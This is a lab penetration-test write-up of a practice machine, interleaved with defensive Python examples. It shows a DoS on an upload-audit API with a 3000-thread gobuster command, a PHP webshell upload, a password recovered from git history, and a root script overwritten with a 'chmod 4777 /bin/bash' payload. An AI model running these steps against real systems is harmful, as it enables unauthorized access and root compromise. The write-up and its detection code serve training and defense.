This article documents a hands-on penetration test against a target machine (a practice box). The attacker first launched a DoS attack on the file audit API on port 3000 to disable it, thereby bypassing the format restrictions on port 80. This allowed a successful upload of a PHP Webshell to gain initial access. Next, Git information leakage was discovered in the /opt directory. By using `git show`, the attacker retrieved the hidden login password for user `tuf` from a historical commit. Finally, through information gathering, it was found that a root process was running `/home/tuf/app.py` in the background. The attacker overwrote this script, injecting malicious code to grant SUID permissions to `/bin/bash`, successfully escalating privileges to root.

Information Gathering

# Nmap 7.95 scan initiated Wed Dec 24 02:48:02 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 192.168.110.98
Nmap scan report for Kuai.lan (192.168.110.98)
Host is up (0.00046s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Maze\xE4\xB8\x8A\xE4\xBC\xA0
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
3000/tcp open  http    Werkzeug httpd 3.1.4 (Python 3.9.2)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/3.1.4 Python/3.9.2
| http-methods:
|_  Supported Methods: HEAD GET OPTIONS
MAC Address: 08:00:27:04:C1:49 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Uptime guess: 9.769 days (since Sun Dec 14 08:21:29 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 24 02:48:16 2025 -- 1 IP address (1 host up) scanned in 13.83 seconds

Port 80 hosts a file-upload site. Uploaded files land in http://192.168.110.98/uploads/

  • Status: the upload is being sent to the audit server for review
  • Only JPG image files may be uploaded

http://192.168.110.98:3000/api is the endpoint the upload site calls to audit files.

Vulnerability Analysis

Launch a DoS against http://192.168.110.98:3000/api to knock it out; with the audit service unreachable, the upload format restriction is bypassed.

Then simply upload a PHP file.
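The bypass works because the upload handler fails open: when the audit API on port 3000 stops answering, the file is stored anyway. The following added example (not code from the writeup or the target machine) contrasts that fail-open gate with a fail-closed one that also enforces the JPG restriction locally; the gate functions, the `AuditUnavailable` exception, `make_audit` and the sample uploads are assumptions constructed for this illustration.

```python
"""Fail-open vs fail-closed gating of uploads when the audit service is down.

Added example, not code from the writeup or the target machine. It models
the flow the writeup describes: the upload handler on port 80 forwards each
file to an audit API on port 3000 and is meant to accept only JPG images.
The gate functions, AuditUnavailable, make_audit and the sample uploads are
assumptions constructed for this illustration.
"""
import os


class AuditUnavailable(Exception):
    """Raised when the audit API times out or refuses the connection."""


JPEG_MAGIC = b"\xff\xd8\xff"
ALLOWED_EXT = {".jpg", ".jpeg"}


def vulnerable_gate(filename, data, audit):
    """Fail-open: an audit failure is treated like an approval (the bug)."""
    try:
        return audit(filename, data) == "ok"
    except AuditUnavailable:
        return True  # audit unreachable -> file stored without any check


def hardened_gate(filename, data, audit):
    """Fail-closed, with local checks that never depend on the remote audit."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED_EXT:
        return False  # extension allow-list enforced locally
    if not data.startswith(JPEG_MAGIC):
        return False  # content must actually look like a JPEG
    try:
        return audit(filename, data) == "ok"
    except AuditUnavailable:
        return False  # audit unreachable -> reject; never store unchecked content


def make_audit(available):
    """Simulated audit API: approves JPEG bytes that carry no PHP open tag."""
    def audit(filename, data):
        if not available:
            raise AuditUnavailable("connect timeout to :3000/api")
        clean = data.startswith(JPEG_MAGIC) and b"<?php" not in data
        return "ok" if clean else "rejected"
    return audit


# Constructed sample uploads (placeholders, not real payloads)
PHOTO = JPEG_MAGIC + b"\xe0\x00\x10JFIF" + b"\x00" * 16
WEBSHELL = b"<?php /* webshell placeholder */ ?>"
POLYGLOT = PHOTO + WEBSHELL  # valid JPEG header with PHP appended


def demo():
    """Run both gates with the audit service up and down."""
    up, down = make_audit(True), make_audit(False)
    return {
        "vuln_php_audit_up": vulnerable_gate("shell.php", WEBSHELL, up),
        "vuln_php_audit_down": vulnerable_gate("shell.php", WEBSHELL, down),
        "hard_php_audit_down": hardened_gate("shell.php", WEBSHELL, down),
        "hard_jpg_audit_up": hardened_gate("holiday.jpg", PHOTO, up),
        "hard_jpg_audit_down": hardened_gate("holiday.jpg", PHOTO, down),
        "hard_polyglot_audit_up": hardened_gate("shell.php.jpg", POLYGLOT, up),
    }


if __name__ == "__main__":
    for case, accepted in demo().items():
        print(f"{case:24s} accepted={accepted}")
```

The `hard_jpg_audit_down` case is the price of failing closed: legitimate uploads are refused while the audit service is down, which is the correct trade-off for a gate whose only job is to keep executable content out. Storing uploads outside the web root, or serving the uploads directory with no PHP handler, would remove the impact even if a gate is bypassed.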

Exploitation

gobuster dir --url http://192.168.110.98:3000/ --threads 3000 --wordlist /usr/share/wordlists/rockyou.txt (leave it running in the background; this 3000-thread scan against port 3000 is the DoS on the audit service)

Then upload a webshell to get a shell.

www-data@Kuai:/opt$ ls -la
total 16
drwxr-xr-x  3 root root 4096 Dec 23 05:12 .
drwxr-xr-x 18 root root 4096 Mar 18  2025 ..
drwxr-xr-x  8 root root 4096 Dec 23 05:13 .git
-rw-r--r--  1 root root  308 Dec 23 05:12 app.py

Git leak

www-data@Kuai:/opt$ git log
fatal: detected dubious ownership in repository at '/opt'
To add an exception for this directory, call:

	git config --global --add safe.directory /opt
www-data@Kuai:/opt$ git config --global --add safe.directory /opt
fatal: $HOME not set
www-data@Kuai:/opt$ export HOME=/tmp
www-data@Kuai:/opt$ git config --global --add safe.directory /opt
www-data@Kuai:/opt$ git show
commit 937ff3b9ba793ab8e772dc5203f1170629cdfedf (HEAD -> master)
Author: Your Name <you@example.com>
Date:   Tue Dec 23 05:13:09 2025 -0500

    a

diff --git a/app.py b/app.py
index 612613f..24b48b9 100644
--- a/app.py
+++ b/app.py
@@ -2,7 +2,7 @@
 from flask import Flask, jsonify

 app = Flask(__name__)
-// tuf: Cbr5Cq1QBS2GHUOGuJrc
+// tuf:********

 @app.route('/')
 def index():

This recovers Cbr5Cq1QBS2GHUOGuJrc.
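Redacting a credential in a later commit does not remove it from history, which is exactly why `git show` still recovered it. As an added example (not from the writeup), the following Python scanner walks `git log -p` text and flags added or removed lines that look like `name: value` or `name = value` with a long alphanumeric token; the sample log reuses the redaction commit shown above plus a constructed earlier commit (all-zero sha) that introduced the line.

```python
"""Scan `git log -p` output for credentials that were committed, even if a
later commit "redacted" them.

Added example, not code from the writeup. The scanner reads patch text and
reports any added (+) or removed (-) line that looks like "name: value" or
"name = value" with a long alphanumeric value. The sample log reuses the
redaction commit shown in the writeup; the earlier commit that introduced
the line (sha of all zeros) is constructed for this illustration.
"""
import re

SECRET_RE = re.compile(
    r"""^(?P<sign>[+-])(?![+-]{2})   # a +/- diff line, not a +++/--- file header
        .*?                          # any prefix: comment markers, indentation
        \b(?P<key>[A-Za-z_][A-Za-z0-9_]*)\s*[:=]\s*['"]?
        (?P<value>[A-Za-z0-9+/=_-]{16,})""",
    re.VERBOSE,
)


def looks_like_secret(value):
    """Cheap entropy proxy: mixed letters and digits, so '********' is skipped."""
    return any(c.isdigit() for c in value) and any(c.isalpha() for c in value)


def scan_git_log(log_text):
    """Return findings as dicts: commit, file, side, key, value."""
    findings = []
    commit = path = None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("diff --git "):
            path = line.rsplit(" b/", 1)[1]
        else:
            m = SECRET_RE.match(line)
            if m and looks_like_secret(m.group("value")):
                findings.append({
                    "commit": commit,
                    "file": path,
                    "side": "removed" if m.group("sign") == "-" else "added",
                    "key": m.group("key"),
                    "value": m.group("value"),
                })
    return findings


def mask(value):
    """Keep a short prefix so a finding can be matched without echoing the secret."""
    return value[:4] + "*" * (len(value) - 4)


# Constructed sample: newest commit first, as `git log -p` prints it.
SAMPLE_LOG = """\
commit 937ff3b9ba793ab8e772dc5203f1170629cdfedf (HEAD -> master)
Author: Your Name <you@example.com>
Date:   Tue Dec 23 05:13:09 2025 -0500

    a

diff --git a/app.py b/app.py
index 612613f..24b48b9 100644
--- a/app.py
+++ b/app.py
@@ -2,7 +2,7 @@
 from flask import Flask, jsonify

 app = Flask(__name__)
-// tuf: Cbr5Cq1QBS2GHUOGuJrc
+// tuf:********

 @app.route('/')
 def index():

commit 0000000000000000000000000000000000000000
Author: Your Name <you@example.com>
Date:   Tue Dec 23 05:12:00 2025 -0500

    initial

diff --git a/app.py b/app.py
new file mode 100644
index 0000000..612613f
--- /dev/null
+++ b/app.py
@@ -0,0 +1,5 @@
+from flask import Flask, jsonify
+
+app = Flask(__name__)
+// tuf: Cbr5Cq1QBS2GHUOGuJrc
+
"""

if __name__ == "__main__":
    for f in scan_git_log(SAMPLE_LOG):
        print(f"{f['commit'][:12]} {f['file']} {f['side']:7s} {f['key']}={mask(f['value'])}")
```

Feed it real history with `git log -p --all | python3 scan.py` (reading stdin instead of the constructed sample); a hit on a removed line is the signal that a credential was "cleaned up" without rotation, and the only real fix is rotating the credential and rewriting or not exposing the repository.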

Privilege Escalation

tuf@Kuai:~$ ps -ef
root         353     337  0 01:29 ?        00:00:00 /bin/sh -c python3 /home/tuf/app.py
nano a.py
# contents: import os;os.system('chmod 4777 /bin/bash')
rm app.py
mv a.py app.py

That's all it takes.
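The root job executes a script that lives in a home directory owned by tuf, so tuf can delete and replace it even if the file itself were root-owned (the `rm` and `mv` above succeed because the directory is writable). The following added example (not from the writeup) parses `ps -ef` output, extracts script paths from root-owned command lines and reports those whose file or parent directory a non-root user controls; it also checks for a setuid bit on shells. The ownership values (tuf as uid 1000), the second sample process, the `/usr/lib/audit/server.py` path and the fake stat are constructed so it runs offline.

```python
"""Audit root-run scripts whose file or directory a non-root user can replace.

Added example, not code from the writeup or the target machine. It parses
`ps -ef` output, pulls script paths out of root-owned command lines, and
checks who owns (and who can write) the script and its parent directory.
The sample ps line is the one from the writeup; the ownership/mode values
(tuf = uid 1000, /bin/bash with mode 4777 after the attack) and the second
process are constructed and supplied through a fake stat so it runs offline.
"""
import os
import re
import stat
from collections import namedtuple

# Absolute script paths handed to an interpreter, e.g. "python3 /home/tuf/app.py"
SCRIPT_RE = re.compile(r"(?:python[23]?|sh|bash|perl)\s+(/\S+)")

FakeStat = namedtuple("FakeStat", "st_uid st_mode")  # only the fields we read


def parse_ps_ef(text):
    """Yield (user, pid, command) from `ps -ef` output; CMD is the 8th column."""
    for line in text.splitlines():
        parts = line.split(None, 7)
        if len(parts) < 8 or parts[0] == "UID":
            continue
        yield parts[0], parts[1], parts[7]


def weak_points(path, stat_fn):
    """Reasons a non-root user could control `path`: the file or its directory."""
    reasons = []
    for label, p in (("file", path), ("directory", os.path.dirname(path))):
        try:
            st = stat_fn(p)
        except FileNotFoundError:
            continue
        if st.st_uid != 0:
            reasons.append(f"{label} {p} owned by uid {st.st_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append(f"{label} {p} group/world-writable")
    return reasons


def find_hijackable_scripts(ps_text, stat_fn=os.stat):
    """Root processes running a script that someone other than root can replace."""
    findings = []
    for user, pid, cmd in parse_ps_ef(ps_text):
        if user != "root":
            continue
        for path in SCRIPT_RE.findall(cmd):
            reasons = weak_points(path, stat_fn)
            if reasons:
                findings.append({"pid": pid, "script": path, "reasons": reasons})
    return findings


def unexpected_suid(paths, stat_fn=os.stat):
    """Paths carrying the setuid bit; shells and interpreters never should."""
    return [p for p in paths if stat_fn(p).st_mode & stat.S_ISUID]


# Constructed sample: first line is the writeup's, second is a benign root job.
SAMPLE_PS = """\
UID          PID    PPID  C STIME TTY          TIME CMD
root         353     337  0 01:29 ?        00:00:00 /bin/sh -c python3 /home/tuf/app.py
root         410       1  0 01:29 ?        00:00:00 python3 /usr/lib/audit/server.py
"""

# Constructed ownership/modes mirroring the state described in the writeup.
FAKE_FS = {
    "/home/tuf": FakeStat(1000, stat.S_IFDIR | 0o755),
    "/home/tuf/app.py": FakeStat(1000, stat.S_IFREG | 0o644),
    "/usr/lib/audit": FakeStat(0, stat.S_IFDIR | 0o755),
    "/usr/lib/audit/server.py": FakeStat(0, stat.S_IFREG | 0o644),
    "/bin/bash": FakeStat(0, stat.S_IFREG | 0o4777),  # after chmod 4777
    "/usr/bin/python3": FakeStat(0, stat.S_IFREG | 0o755),
}


def fake_stat(path):
    """Stand-in for os.stat over the constructed filesystem above."""
    try:
        return FAKE_FS[path]
    except KeyError:
        raise FileNotFoundError(path)


def demo():
    """Run both checks against the constructed sample."""
    return (find_hijackable_scripts(SAMPLE_PS, fake_stat),
            unexpected_suid(["/bin/bash", "/usr/bin/python3"], fake_stat))


if __name__ == "__main__":
    hijack, suid = demo()
    for f in hijack:
        print(f"pid {f['pid']} runs {f['script']}: " + "; ".join(f["reasons"]))
    print("setuid on:", suid)
```

On a live host, call `find_hijackable_scripts(subprocess.check_output(["ps", "-ef"], text=True))` with the default `os.stat`; the remediation is to run scheduled root jobs from a root-owned directory with root-owned files, and to alert on any new setuid bit under `/bin` or `/usr/bin`.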
